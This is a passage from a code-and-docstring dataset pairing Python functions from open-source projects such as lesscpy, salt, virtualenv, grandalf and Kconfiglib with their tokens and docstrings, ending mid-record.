repo
stringlengths
7
54
path
stringlengths
4
192
url
stringlengths
87
284
code
stringlengths
78
104k
code_tokens
list
docstring
stringlengths
1
46.9k
docstring_tokens
list
language
stringclasses
1 value
partition
stringclasses
3 values
BD2KGenomics/toil-scripts
src/toil_scripts/exome_variant_pipeline/exome_variant_pipeline.py
https://github.com/BD2KGenomics/toil-scripts/blob/f878d863defcdccaabb7fe06f991451b7a198fb7/src/toil_scripts/exome_variant_pipeline/exome_variant_pipeline.py#L85-L96
def index_bams(job, config): """ Convenience job for handling bam indexing to make the workflow declaration cleaner :param JobFunctionWrappingJob job: passed automatically by Toil :param Namespace config: Argparse Namespace object containing argument inputs """ job.fileStore.logToMaster('Indexed sample BAMS: ' + config.uuid) disk = '1G' if config.ci_test else '20G' config.normal_bai = job.addChildJobFn(run_samtools_index, config.normal_bam, cores=1, disk=disk).rv() config.tumor_bai = job.addChildJobFn(run_samtools_index, config.tumor_bam, cores=1, disk=disk).rv() job.addFollowOnJobFn(preprocessing_declaration, config)
[ "def", "index_bams", "(", "job", ",", "config", ")", ":", "job", ".", "fileStore", ".", "logToMaster", "(", "'Indexed sample BAMS: '", "+", "config", ".", "uuid", ")", "disk", "=", "'1G'", "if", "config", ".", "ci_test", "else", "'20G'", "config", ".", "normal_bai", "=", "job", ".", "addChildJobFn", "(", "run_samtools_index", ",", "config", ".", "normal_bam", ",", "cores", "=", "1", ",", "disk", "=", "disk", ")", ".", "rv", "(", ")", "config", ".", "tumor_bai", "=", "job", ".", "addChildJobFn", "(", "run_samtools_index", ",", "config", ".", "tumor_bam", ",", "cores", "=", "1", ",", "disk", "=", "disk", ")", ".", "rv", "(", ")", "job", ".", "addFollowOnJobFn", "(", "preprocessing_declaration", ",", "config", ")" ]
Convenience job for handling bam indexing to make the workflow declaration cleaner :param JobFunctionWrappingJob job: passed automatically by Toil :param Namespace config: Argparse Namespace object containing argument inputs
[ "Convenience", "job", "for", "handling", "bam", "indexing", "to", "make", "the", "workflow", "declaration", "cleaner" ]
python
train
lesscpy/lesscpy
lesscpy/lessc/parser.py
https://github.com/lesscpy/lesscpy/blob/51e392fb4a3cd4ccfb6175e0e42ce7d2f6b78126/lesscpy/lessc/parser.py#L226-L271
def p_statement_import(self, p): """ import_statement : css_import t_ws string t_semicolon | css_import t_ws css_string t_semicolon | css_import t_ws css_string media_query_list t_semicolon | css_import t_ws fcall t_semicolon | css_import t_ws fcall media_query_list t_semicolon """ #import pdb; pdb.set_trace() if self.importlvl > 8: raise ImportError( 'Recrusive import level too deep > 8 (circular import ?)') if isinstance(p[3], string_types): ipath = utility.destring(p[3]) elif isinstance(p[3], list): p[3] = Import(p[3], p.lineno(4)).parse(self.scope) ipath = utility.destring(p[3]) elif isinstance(p[3], Call): # NOTE(saschpe): Always in the form of 'url("...");', so parse it # and retrieve the inner css_string. This whole func is messy. p[3] = p[3].parse( self.scope) # Store it as string, Statement.fmt expects it. ipath = utility.destring(p[3][4:-1]) fn, fe = os.path.splitext(ipath) if not fe or fe.lower() == '.less': try: cpath = os.path.dirname(os.path.abspath(self.target)) if not fe: ipath += '.less' filename = "%s%s%s" % (cpath, os.sep, ipath) if os.path.exists(filename): recurse = LessParser( importlvl=self.importlvl + 1, verbose=self.verbose, scope=self.scope) recurse.parse(filename=filename, debuglevel=0) p[0] = recurse.result else: err = "Cannot import '%s', file not found" % filename self.handle_error(err, p.lineno(1), 'W') p[0] = None except ImportError as e: self.handle_error(e, p) else: p[0] = Statement(list(p)[1:], p.lineno(1)) p[0].parse(None) sys.stdout.flush()
[ "def", "p_statement_import", "(", "self", ",", "p", ")", ":", "#import pdb; pdb.set_trace()", "if", "self", ".", "importlvl", ">", "8", ":", "raise", "ImportError", "(", "'Recrusive import level too deep > 8 (circular import ?)'", ")", "if", "isinstance", "(", "p", "[", "3", "]", ",", "string_types", ")", ":", "ipath", "=", "utility", ".", "destring", "(", "p", "[", "3", "]", ")", "elif", "isinstance", "(", "p", "[", "3", "]", ",", "list", ")", ":", "p", "[", "3", "]", "=", "Import", "(", "p", "[", "3", "]", ",", "p", ".", "lineno", "(", "4", ")", ")", ".", "parse", "(", "self", ".", "scope", ")", "ipath", "=", "utility", ".", "destring", "(", "p", "[", "3", "]", ")", "elif", "isinstance", "(", "p", "[", "3", "]", ",", "Call", ")", ":", "# NOTE(saschpe): Always in the form of 'url(\"...\");', so parse it", "# and retrieve the inner css_string. This whole func is messy.", "p", "[", "3", "]", "=", "p", "[", "3", "]", ".", "parse", "(", "self", ".", "scope", ")", "# Store it as string, Statement.fmt expects it.", "ipath", "=", "utility", ".", "destring", "(", "p", "[", "3", "]", "[", "4", ":", "-", "1", "]", ")", "fn", ",", "fe", "=", "os", ".", "path", ".", "splitext", "(", "ipath", ")", "if", "not", "fe", "or", "fe", ".", "lower", "(", ")", "==", "'.less'", ":", "try", ":", "cpath", "=", "os", ".", "path", ".", "dirname", "(", "os", ".", "path", ".", "abspath", "(", "self", ".", "target", ")", ")", "if", "not", "fe", ":", "ipath", "+=", "'.less'", "filename", "=", "\"%s%s%s\"", "%", "(", "cpath", ",", "os", ".", "sep", ",", "ipath", ")", "if", "os", ".", "path", ".", "exists", "(", "filename", ")", ":", "recurse", "=", "LessParser", "(", "importlvl", "=", "self", ".", "importlvl", "+", "1", ",", "verbose", "=", "self", ".", "verbose", ",", "scope", "=", "self", ".", "scope", ")", "recurse", ".", "parse", "(", "filename", "=", "filename", ",", "debuglevel", "=", "0", ")", "p", "[", "0", "]", "=", "recurse", ".", "result", "else", ":", "err", "=", "\"Cannot import '%s', file not found\"", "%", "filename", "self", ".", "handle_error", "(", "err", ",", "p", ".", "lineno", "(", "1", ")", ",", "'W'", ")", "p", "[", "0", "]", "=", "None", "except", "ImportError", "as", "e", ":", "self", ".", "handle_error", "(", "e", ",", "p", ")", "else", ":", "p", "[", "0", "]", "=", "Statement", "(", "list", "(", "p", ")", "[", "1", ":", "]", ",", "p", ".", "lineno", "(", "1", ")", ")", "p", "[", "0", "]", ".", "parse", "(", "None", ")", "sys", ".", "stdout", ".", "flush", "(", ")" ]
import_statement : css_import t_ws string t_semicolon | css_import t_ws css_string t_semicolon | css_import t_ws css_string media_query_list t_semicolon | css_import t_ws fcall t_semicolon | css_import t_ws fcall media_query_list t_semicolon
[ "import_statement", ":", "css_import", "t_ws", "string", "t_semicolon", "|", "css_import", "t_ws", "css_string", "t_semicolon", "|", "css_import", "t_ws", "css_string", "media_query_list", "t_semicolon", "|", "css_import", "t_ws", "fcall", "t_semicolon", "|", "css_import", "t_ws", "fcall", "media_query_list", "t_semicolon" ]
python
valid
apache/incubator-heron
heron/tools/tracker/src/python/topology.py
https://github.com/apache/incubator-heron/blob/ad10325a0febe89ad337e561ebcbe37ec5d9a5ac/heron/tools/tracker/src/python/topology.py#L95-L102
def unregister_watch(self, uid): """ Unregister the watch with the given UUID. """ # Do not raise an error if UUID is # not present in the watches. Log.info("Unregister a watch with uid: " + str(uid)) self.watches.pop(uid, None)
[ "def", "unregister_watch", "(", "self", ",", "uid", ")", ":", "# Do not raise an error if UUID is", "# not present in the watches.", "Log", ".", "info", "(", "\"Unregister a watch with uid: \"", "+", "str", "(", "uid", ")", ")", "self", ".", "watches", ".", "pop", "(", "uid", ",", "None", ")" ]
Unregister the watch with the given UUID.
[ "Unregister", "the", "watch", "with", "the", "given", "UUID", "." ]
python
valid
nerdvegas/rez
src/build_utils/virtualenv/virtualenv.py
https://github.com/nerdvegas/rez/blob/1d3b846d53b5b5404edfe8ddb9083f9ceec8c5e7/src/build_utils/virtualenv/virtualenv.py#L1569-L1591
def resolve_interpreter(exe): """ If the executable given isn't an absolute path, search $PATH for the interpreter """ # If the "executable" is a version number, get the installed executable for # that version python_versions = get_installed_pythons() if exe in python_versions: exe = python_versions[exe] if os.path.abspath(exe) != exe: paths = os.environ.get('PATH', '').split(os.pathsep) for path in paths: if os.path.exists(os.path.join(path, exe)): exe = os.path.join(path, exe) break if not os.path.exists(exe): logger.fatal('The executable %s (from --python=%s) does not exist' % (exe, exe)) raise SystemExit(3) if not is_executable(exe): logger.fatal('The executable %s (from --python=%s) is not executable' % (exe, exe)) raise SystemExit(3) return exe
[ "def", "resolve_interpreter", "(", "exe", ")", ":", "# If the \"executable\" is a version number, get the installed executable for", "# that version", "python_versions", "=", "get_installed_pythons", "(", ")", "if", "exe", "in", "python_versions", ":", "exe", "=", "python_versions", "[", "exe", "]", "if", "os", ".", "path", ".", "abspath", "(", "exe", ")", "!=", "exe", ":", "paths", "=", "os", ".", "environ", ".", "get", "(", "'PATH'", ",", "''", ")", ".", "split", "(", "os", ".", "pathsep", ")", "for", "path", "in", "paths", ":", "if", "os", ".", "path", ".", "exists", "(", "os", ".", "path", ".", "join", "(", "path", ",", "exe", ")", ")", ":", "exe", "=", "os", ".", "path", ".", "join", "(", "path", ",", "exe", ")", "break", "if", "not", "os", ".", "path", ".", "exists", "(", "exe", ")", ":", "logger", ".", "fatal", "(", "'The executable %s (from --python=%s) does not exist'", "%", "(", "exe", ",", "exe", ")", ")", "raise", "SystemExit", "(", "3", ")", "if", "not", "is_executable", "(", "exe", ")", ":", "logger", ".", "fatal", "(", "'The executable %s (from --python=%s) is not executable'", "%", "(", "exe", ",", "exe", ")", ")", "raise", "SystemExit", "(", "3", ")", "return", "exe" ]
If the executable given isn't an absolute path, search $PATH for the interpreter
[ "If", "the", "executable", "given", "isn", "t", "an", "absolute", "path", "search", "$PATH", "for", "the", "interpreter" ]
python
train
bdcht/grandalf
grandalf/layouts.py
https://github.com/bdcht/grandalf/blob/b0a604afa79e5201eebe5feb56ae5ec7afc07b95/grandalf/layouts.py#L378-L404
def init_all(self,roots=None,inverted_edges=None,optimize=False): """initializes the layout algorithm by computing roots (unless provided), inverted edges (unless provided), vertices ranks and creates all dummy vertices and layers. Parameters: roots (list[Vertex]): set *root* vertices (layer 0) inverted_edges (list[Edge]): set edges to invert to have a DAG. optimize (bool): optimize ranking if True (default False) """ if self.initdone: return # For layered sugiyama algorithm, the input graph must be acyclic, # so we must provide a list of root nodes and a list of inverted edges. if roots==None: roots = [v for v in self.g.sV if len(v.e_in())==0] if inverted_edges==None: L = self.g.get_scs_with_feedback(roots) inverted_edges = [x for x in self.g.sE if x.feedback] self.alt_e = inverted_edges # assign rank to all vertices: self.rank_all(roots,optimize) # add dummy vertex/edge for 'long' edges: for e in self.g.E(): self.setdummies(e) # precompute some layers values: for l in self.layers: l.setup(self) self.initdone = True
[ "def", "init_all", "(", "self", ",", "roots", "=", "None", ",", "inverted_edges", "=", "None", ",", "optimize", "=", "False", ")", ":", "if", "self", ".", "initdone", ":", "return", "# For layered sugiyama algorithm, the input graph must be acyclic,", "# so we must provide a list of root nodes and a list of inverted edges.", "if", "roots", "==", "None", ":", "roots", "=", "[", "v", "for", "v", "in", "self", ".", "g", ".", "sV", "if", "len", "(", "v", ".", "e_in", "(", ")", ")", "==", "0", "]", "if", "inverted_edges", "==", "None", ":", "L", "=", "self", ".", "g", ".", "get_scs_with_feedback", "(", "roots", ")", "inverted_edges", "=", "[", "x", "for", "x", "in", "self", ".", "g", ".", "sE", "if", "x", ".", "feedback", "]", "self", ".", "alt_e", "=", "inverted_edges", "# assign rank to all vertices:", "self", ".", "rank_all", "(", "roots", ",", "optimize", ")", "# add dummy vertex/edge for 'long' edges:", "for", "e", "in", "self", ".", "g", ".", "E", "(", ")", ":", "self", ".", "setdummies", "(", "e", ")", "# precompute some layers values:", "for", "l", "in", "self", ".", "layers", ":", "l", ".", "setup", "(", "self", ")", "self", ".", "initdone", "=", "True" ]
initializes the layout algorithm by computing roots (unless provided), inverted edges (unless provided), vertices ranks and creates all dummy vertices and layers. Parameters: roots (list[Vertex]): set *root* vertices (layer 0) inverted_edges (list[Edge]): set edges to invert to have a DAG. optimize (bool): optimize ranking if True (default False)
[ "initializes", "the", "layout", "algorithm", "by", "computing", "roots", "(", "unless", "provided", ")", "inverted", "edges", "(", "unless", "provided", ")", "vertices", "ranks", "and", "creates", "all", "dummy", "vertices", "and", "layers", ".", "Parameters", ":", "roots", "(", "list", "[", "Vertex", "]", ")", ":", "set", "*", "root", "*", "vertices", "(", "layer", "0", ")", "inverted_edges", "(", "list", "[", "Edge", "]", ")", ":", "set", "edges", "to", "invert", "to", "have", "a", "DAG", ".", "optimize", "(", "bool", ")", ":", "optimize", "ranking", "if", "True", "(", "default", "False", ")" ]
python
train
wtsi-hgi/consul-lock
consullock/managers.py
https://github.com/wtsi-hgi/consul-lock/blob/deb07ab41dabbb49f4d0bbc062bc3b4b6e5d71b2/consullock/managers.py#L296-L305
def release_all(self, keys: Sequence[str]) -> Set[str]: """ Releases all of the given keys. :param keys: the keys to release :return: the names of the keys that were released """ released: List[str] = [] for key in keys: released.append(self.release(key)) return set(filter(None,released))
[ "def", "release_all", "(", "self", ",", "keys", ":", "Sequence", "[", "str", "]", ")", "->", "Set", "[", "str", "]", ":", "released", ":", "List", "[", "str", "]", "=", "[", "]", "for", "key", "in", "keys", ":", "released", ".", "append", "(", "self", ".", "release", "(", "key", ")", ")", "return", "set", "(", "filter", "(", "None", ",", "released", ")", ")" ]
Releases all of the given keys. :param keys: the keys to release :return: the names of the keys that were released
[ "Releases", "all", "of", "the", "given", "keys", ".", ":", "param", "keys", ":", "the", "keys", "to", "release", ":", "return", ":", "the", "names", "of", "the", "keys", "that", "were", "released" ]
python
train
saltstack/salt
salt/modules/status.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/status.py#L444-L604
def meminfo(): ''' Return the memory info for this minion .. versionchanged:: 2016.11.4 Added support for AIX .. versionchanged:: 2018.3.0 Added support for OpenBSD CLI Example: .. code-block:: bash salt '*' status.meminfo ''' def linux_meminfo(): ''' linux specific implementation of meminfo ''' ret = {} try: with salt.utils.files.fopen('/proc/meminfo', 'r') as fp_: stats = salt.utils.stringutils.to_unicode(fp_.read()) except IOError: pass else: for line in stats.splitlines(): if not line: continue comps = line.split() comps[0] = comps[0].replace(':', '') ret[comps[0]] = { 'value': comps[1], } if len(comps) > 2: ret[comps[0]]['unit'] = comps[2] return ret def freebsd_meminfo(): ''' freebsd specific implementation of meminfo ''' sysctlvm = __salt__['cmd.run']('sysctl vm').splitlines() sysctlvm = [x for x in sysctlvm if x.startswith('vm')] sysctlvm = [x.split(':') for x in sysctlvm] sysctlvm = [[y.strip() for y in x] for x in sysctlvm] sysctlvm = [x for x in sysctlvm if x[1]] # If x[1] not empty ret = {} for line in sysctlvm: ret[line[0]] = line[1] # Special handling for vm.total as it's especially important sysctlvmtot = __salt__['cmd.run']('sysctl -n vm.vmtotal').splitlines() sysctlvmtot = [x for x in sysctlvmtot if x] ret['vm.vmtotal'] = sysctlvmtot return ret def aix_meminfo(): ''' AIX specific implementation of meminfo ''' ret = {} ret['svmon'] = [] ret['vmstat'] = [] procn = None fields = [] pagesize_flag = False for line in __salt__['cmd.run']('svmon -G').splitlines(): # Note: svmon is per-system # size inuse free pin virtual mmode #memory 1048576 1039740 8836 285078 474993 Ded #pg space 917504 2574 # # work pers clnt other #pin 248379 0 2107 34592 #in use 474993 0 564747 # #PageSize PoolSize inuse pgsp pin virtual #s 4 KB - 666956 2574 60726 102209 #m 64 KB - 23299 0 14022 23299 if not line: continue if re.match(r'\s', line): # assume fields line fields = line.split() continue if line.startswith('memory') or line.startswith('pin'): procn = len(ret['svmon']) ret['svmon'].append({}) comps = line.split() ret['svmon'][procn][comps[0]] = {} for i in range(0, len(fields)): if len(comps) > i + 1: ret['svmon'][procn][comps[0]][fields[i]] = comps[i+1] continue if line.startswith('pg space') or line.startswith('in use'): procn = len(ret['svmon']) ret['svmon'].append({}) comps = line.split() pg_space = '{0} {1}'.format(comps[0], comps[1]) ret['svmon'][procn][pg_space] = {} for i in range(0, len(fields)): if len(comps) > i + 2: ret['svmon'][procn][pg_space][fields[i]] = comps[i+2] continue if line.startswith('PageSize'): fields = line.split() pagesize_flag = False continue if pagesize_flag: procn = len(ret['svmon']) ret['svmon'].append({}) comps = line.split() ret['svmon'][procn][comps[0]] = {} for i in range(0, len(fields)): if len(comps) > i: ret['svmon'][procn][comps[0]][fields[i]] = comps[i] continue for line in __salt__['cmd.run']('vmstat -v').splitlines(): # Note: vmstat is per-system if not line: continue procn = len(ret['vmstat']) ret['vmstat'].append({}) comps = line.lstrip().split(' ', 1) ret['vmstat'][procn][comps[1]] = comps[0] return ret def openbsd_meminfo(): ''' openbsd specific implementation of meminfo ''' vmstat = __salt__['cmd.run']('vmstat').splitlines() # We're only interested in memory and page values which are printed # as subsequent fields. fields = ['active virtual pages', 'free list size', 'page faults', 'pages reclaimed', 'pages paged in', 'pages paged out', 'pages freed', 'pages scanned'] data = vmstat[2].split()[2:10] ret = dict(zip(fields, data)) return ret # dict that return a function that does the right thing per platform get_version = { 'Linux': linux_meminfo, 'FreeBSD': freebsd_meminfo, 'OpenBSD': openbsd_meminfo, 'AIX': aix_meminfo, } errmsg = 'This method is unsupported on the current operating system!' return get_version.get(__grains__['kernel'], lambda: errmsg)()
[ "def", "meminfo", "(", ")", ":", "def", "linux_meminfo", "(", ")", ":", "'''\n linux specific implementation of meminfo\n '''", "ret", "=", "{", "}", "try", ":", "with", "salt", ".", "utils", ".", "files", ".", "fopen", "(", "'/proc/meminfo'", ",", "'r'", ")", "as", "fp_", ":", "stats", "=", "salt", ".", "utils", ".", "stringutils", ".", "to_unicode", "(", "fp_", ".", "read", "(", ")", ")", "except", "IOError", ":", "pass", "else", ":", "for", "line", "in", "stats", ".", "splitlines", "(", ")", ":", "if", "not", "line", ":", "continue", "comps", "=", "line", ".", "split", "(", ")", "comps", "[", "0", "]", "=", "comps", "[", "0", "]", ".", "replace", "(", "':'", ",", "''", ")", "ret", "[", "comps", "[", "0", "]", "]", "=", "{", "'value'", ":", "comps", "[", "1", "]", ",", "}", "if", "len", "(", "comps", ")", ">", "2", ":", "ret", "[", "comps", "[", "0", "]", "]", "[", "'unit'", "]", "=", "comps", "[", "2", "]", "return", "ret", "def", "freebsd_meminfo", "(", ")", ":", "'''\n freebsd specific implementation of meminfo\n '''", "sysctlvm", "=", "__salt__", "[", "'cmd.run'", "]", "(", "'sysctl vm'", ")", ".", "splitlines", "(", ")", "sysctlvm", "=", "[", "x", "for", "x", "in", "sysctlvm", "if", "x", ".", "startswith", "(", "'vm'", ")", "]", "sysctlvm", "=", "[", "x", ".", "split", "(", "':'", ")", "for", "x", "in", "sysctlvm", "]", "sysctlvm", "=", "[", "[", "y", ".", "strip", "(", ")", "for", "y", "in", "x", "]", "for", "x", "in", "sysctlvm", "]", "sysctlvm", "=", "[", "x", "for", "x", "in", "sysctlvm", "if", "x", "[", "1", "]", "]", "# If x[1] not empty", "ret", "=", "{", "}", "for", "line", "in", "sysctlvm", ":", "ret", "[", "line", "[", "0", "]", "]", "=", "line", "[", "1", "]", "# Special handling for vm.total as it's especially important", "sysctlvmtot", "=", "__salt__", "[", "'cmd.run'", "]", "(", "'sysctl -n vm.vmtotal'", ")", ".", "splitlines", "(", ")", "sysctlvmtot", "=", "[", "x", "for", "x", "in", "sysctlvmtot", "if", "x", "]", "ret", "[", "'vm.vmtotal'", "]", "=", "sysctlvmtot", "return", "ret", "def", "aix_meminfo", "(", ")", ":", "'''\n AIX specific implementation of meminfo\n '''", "ret", "=", "{", "}", "ret", "[", "'svmon'", "]", "=", "[", "]", "ret", "[", "'vmstat'", "]", "=", "[", "]", "procn", "=", "None", "fields", "=", "[", "]", "pagesize_flag", "=", "False", "for", "line", "in", "__salt__", "[", "'cmd.run'", "]", "(", "'svmon -G'", ")", ".", "splitlines", "(", ")", ":", "# Note: svmon is per-system", "# size inuse free pin virtual mmode", "#memory 1048576 1039740 8836 285078 474993 Ded", "#pg space 917504 2574", "#", "# work pers clnt other", "#pin 248379 0 2107 34592", "#in use 474993 0 564747", "#", "#PageSize PoolSize inuse pgsp pin virtual", "#s 4 KB - 666956 2574 60726 102209", "#m 64 KB - 23299 0 14022 23299", "if", "not", "line", ":", "continue", "if", "re", ".", "match", "(", "r'\\s'", ",", "line", ")", ":", "# assume fields line", "fields", "=", "line", ".", "split", "(", ")", "continue", "if", "line", ".", "startswith", "(", "'memory'", ")", "or", "line", ".", "startswith", "(", "'pin'", ")", ":", "procn", "=", "len", "(", "ret", "[", "'svmon'", "]", ")", "ret", "[", "'svmon'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "split", "(", ")", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "=", "{", "}", "for", "i", "in", "range", "(", "0", ",", "len", "(", "fields", ")", ")", ":", "if", "len", "(", "comps", ")", ">", "i", "+", "1", ":", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "[", "fields", "[", "i", "]", "]", "=", "comps", "[", "i", "+", "1", "]", "continue", "if", "line", ".", "startswith", "(", "'pg space'", ")", "or", "line", ".", "startswith", "(", "'in use'", ")", ":", "procn", "=", "len", "(", "ret", "[", "'svmon'", "]", ")", "ret", "[", "'svmon'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "split", "(", ")", "pg_space", "=", "'{0} {1}'", ".", "format", "(", "comps", "[", "0", "]", ",", "comps", "[", "1", "]", ")", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "pg_space", "]", "=", "{", "}", "for", "i", "in", "range", "(", "0", ",", "len", "(", "fields", ")", ")", ":", "if", "len", "(", "comps", ")", ">", "i", "+", "2", ":", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "pg_space", "]", "[", "fields", "[", "i", "]", "]", "=", "comps", "[", "i", "+", "2", "]", "continue", "if", "line", ".", "startswith", "(", "'PageSize'", ")", ":", "fields", "=", "line", ".", "split", "(", ")", "pagesize_flag", "=", "False", "continue", "if", "pagesize_flag", ":", "procn", "=", "len", "(", "ret", "[", "'svmon'", "]", ")", "ret", "[", "'svmon'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "split", "(", ")", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "=", "{", "}", "for", "i", "in", "range", "(", "0", ",", "len", "(", "fields", ")", ")", ":", "if", "len", "(", "comps", ")", ">", "i", ":", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "[", "fields", "[", "i", "]", "]", "=", "comps", "[", "i", "]", "continue", "for", "line", "in", "__salt__", "[", "'cmd.run'", "]", "(", "'vmstat -v'", ")", ".", "splitlines", "(", ")", ":", "# Note: vmstat is per-system", "if", "not", "line", ":", "continue", "procn", "=", "len", "(", "ret", "[", "'vmstat'", "]", ")", "ret", "[", "'vmstat'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "lstrip", "(", ")", ".", "split", "(", "' '", ",", "1", ")", "ret", "[", "'vmstat'", "]", "[", "procn", "]", "[", "comps", "[", "1", "]", "]", "=", "comps", "[", "0", "]", "return", "ret", "def", "openbsd_meminfo", "(", ")", ":", "'''\n openbsd specific implementation of meminfo\n '''", "vmstat", "=", "__salt__", "[", "'cmd.run'", "]", "(", "'vmstat'", ")", ".", "splitlines", "(", ")", "# We're only interested in memory and page values which are printed", "# as subsequent fields.", "fields", "=", "[", "'active virtual pages'", ",", "'free list size'", ",", "'page faults'", ",", "'pages reclaimed'", ",", "'pages paged in'", ",", "'pages paged out'", ",", "'pages freed'", ",", "'pages scanned'", "]", "data", "=", "vmstat", "[", "2", "]", ".", "split", "(", ")", "[", "2", ":", "10", "]", "ret", "=", "dict", "(", "zip", "(", "fields", ",", "data", ")", ")", "return", "ret", "# dict that return a function that does the right thing per platform", "get_version", "=", "{", "'Linux'", ":", "linux_meminfo", ",", "'FreeBSD'", ":", "freebsd_meminfo", ",", "'OpenBSD'", ":", "openbsd_meminfo", ",", "'AIX'", ":", "aix_meminfo", ",", "}", "errmsg", "=", "'This method is unsupported on the current operating system!'", "return", "get_version", ".", "get", "(", "__grains__", "[", "'kernel'", "]", ",", "lambda", ":", "errmsg", ")", "(", ")" ]
Return the memory info for this minion .. versionchanged:: 2016.11.4 Added support for AIX .. versionchanged:: 2018.3.0 Added support for OpenBSD CLI Example: .. code-block:: bash salt '*' status.meminfo
[ "Return", "the", "memory", "info", "for", "this", "minion" ]
python
train
mushkevych/scheduler
synergy/scheduler/state_machine_recomputing.py
https://github.com/mushkevych/scheduler/blob/6740331360f49083c208085fb5a60ce80ebf418b/synergy/scheduler/state_machine_recomputing.py#L65-L75
def _compute_and_transfer_to_final_run(self, process_name, start_timeperiod, end_timeperiod, job_record): """ method computes new unit_of_work and transfers the job to STATE_FINAL_RUN it also shares _fuzzy_ DuplicateKeyError logic from _compute_and_transfer_to_progress method""" source_collection_name = context.process_context[process_name].source start_id = self.ds.highest_primary_key(source_collection_name, start_timeperiod, end_timeperiod) end_id = self.ds.lowest_primary_key(source_collection_name, start_timeperiod, end_timeperiod) uow, transfer_to_final = self.insert_and_publish_uow(job_record, start_id, end_id) self.update_job(job_record, uow, job.STATE_FINAL_RUN) if transfer_to_final: self._process_state_final_run(job_record)
[ "def", "_compute_and_transfer_to_final_run", "(", "self", ",", "process_name", ",", "start_timeperiod", ",", "end_timeperiod", ",", "job_record", ")", ":", "source_collection_name", "=", "context", ".", "process_context", "[", "process_name", "]", ".", "source", "start_id", "=", "self", ".", "ds", ".", "highest_primary_key", "(", "source_collection_name", ",", "start_timeperiod", ",", "end_timeperiod", ")", "end_id", "=", "self", ".", "ds", ".", "lowest_primary_key", "(", "source_collection_name", ",", "start_timeperiod", ",", "end_timeperiod", ")", "uow", ",", "transfer_to_final", "=", "self", ".", "insert_and_publish_uow", "(", "job_record", ",", "start_id", ",", "end_id", ")", "self", ".", "update_job", "(", "job_record", ",", "uow", ",", "job", ".", "STATE_FINAL_RUN", ")", "if", "transfer_to_final", ":", "self", ".", "_process_state_final_run", "(", "job_record", ")" ]
method computes new unit_of_work and transfers the job to STATE_FINAL_RUN it also shares _fuzzy_ DuplicateKeyError logic from _compute_and_transfer_to_progress method
[ "method", "computes", "new", "unit_of_work", "and", "transfers", "the", "job", "to", "STATE_FINAL_RUN", "it", "also", "shares", "_fuzzy_", "DuplicateKeyError", "logic", "from", "_compute_and_transfer_to_progress", "method" ]
python
train
globocom/GloboNetworkAPI-client-python
networkapiclient/Ip.py
https://github.com/globocom/GloboNetworkAPI-client-python/blob/cf34f913da48d9abbf750114f5d2ac4b2dde137d/networkapiclient/Ip.py#L241-L273
def check_vip_ip(self, ip, id_evip): """ Get a Ipv4 or Ipv6 for Vip request :param ip: IPv4 or Ipv6. 'xxx.xxx.xxx.xxx or xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx' :return: Dictionary with the following structure: :: {'ip': {'ip': < ip - octs for ipv4, blocks for ipv6 - >, 'id': <id>, 'network4 or network6'}}. :raise IpNaoExisteError: Ipv4 or Ipv6 not found. :raise EnvironemntVipNotFoundError: Vip environment not found. :raise IPNaoDisponivelError: Ip not available for Vip Environment. :raise UserNotAuthorizedError: User dont have permission to perform operation. :raise InvalidParameterError: Ip string or vip environment is none or invalid. :raise XMLError: Networkapi failed to generate the XML response. :raise DataBaseError: Networkapi failed to access the database. """ ip_map = dict() ip_map['ip'] = ip ip_map['id_evip'] = id_evip url = "ip/checkvipip/" code, xml = self.submit({'ip_map': ip_map}, 'POST', url) return self.response(code, xml)
[ "def", "check_vip_ip", "(", "self", ",", "ip", ",", "id_evip", ")", ":", "ip_map", "=", "dict", "(", ")", "ip_map", "[", "'ip'", "]", "=", "ip", "ip_map", "[", "'id_evip'", "]", "=", "id_evip", "url", "=", "\"ip/checkvipip/\"", "code", ",", "xml", "=", "self", ".", "submit", "(", "{", "'ip_map'", ":", "ip_map", "}", ",", "'POST'", ",", "url", ")", "return", "self", ".", "response", "(", "code", ",", "xml", ")" ]
Get a Ipv4 or Ipv6 for Vip request :param ip: IPv4 or Ipv6. 'xxx.xxx.xxx.xxx or xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx' :return: Dictionary with the following structure: :: {'ip': {'ip': < ip - octs for ipv4, blocks for ipv6 - >, 'id': <id>, 'network4 or network6'}}. :raise IpNaoExisteError: Ipv4 or Ipv6 not found. :raise EnvironemntVipNotFoundError: Vip environment not found. :raise IPNaoDisponivelError: Ip not available for Vip Environment. :raise UserNotAuthorizedError: User dont have permission to perform operation. :raise InvalidParameterError: Ip string or vip environment is none or invalid. :raise XMLError: Networkapi failed to generate the XML response. :raise DataBaseError: Networkapi failed to access the database.
[ "Get", "a", "Ipv4", "or", "Ipv6", "for", "Vip", "request" ]
python
train
ulfalizer/Kconfiglib
examples/print_config_tree.py
https://github.com/ulfalizer/Kconfiglib/blob/9fe13c03de16c341cd7ed40167216207b821ea50/examples/print_config_tree.py#L104-L154
def node_str(node): """ Returns the complete menu entry text for a menu node, or "" for invisible menu nodes. Invisible menu nodes are those that lack a prompt or that do not have a satisfied prompt condition. Example return value: "[*] Bool symbol (BOOL)" The symbol name is printed in parentheses to the right of the prompt. """ if not node.prompt: return "" # Even for menu nodes for symbols and choices, it's wrong to check # Symbol.visibility / Choice.visibility here. The reason is that a symbol # (and a choice, in theory) can be defined in multiple locations, giving it # multiple menu nodes, which do not necessarily all have the same prompt # visibility. Symbol.visibility / Choice.visibility is calculated as the OR # of the visibility of all the prompts. prompt, prompt_cond = node.prompt if not expr_value(prompt_cond): return "" if node.item == MENU: return " " + prompt if node.item == COMMENT: return " *** {} ***".format(prompt) # Symbol or Choice sc = node.item if sc.type == UNKNOWN: # Skip symbols defined without a type (these are obscure and generate # a warning) return "" # Add help text if 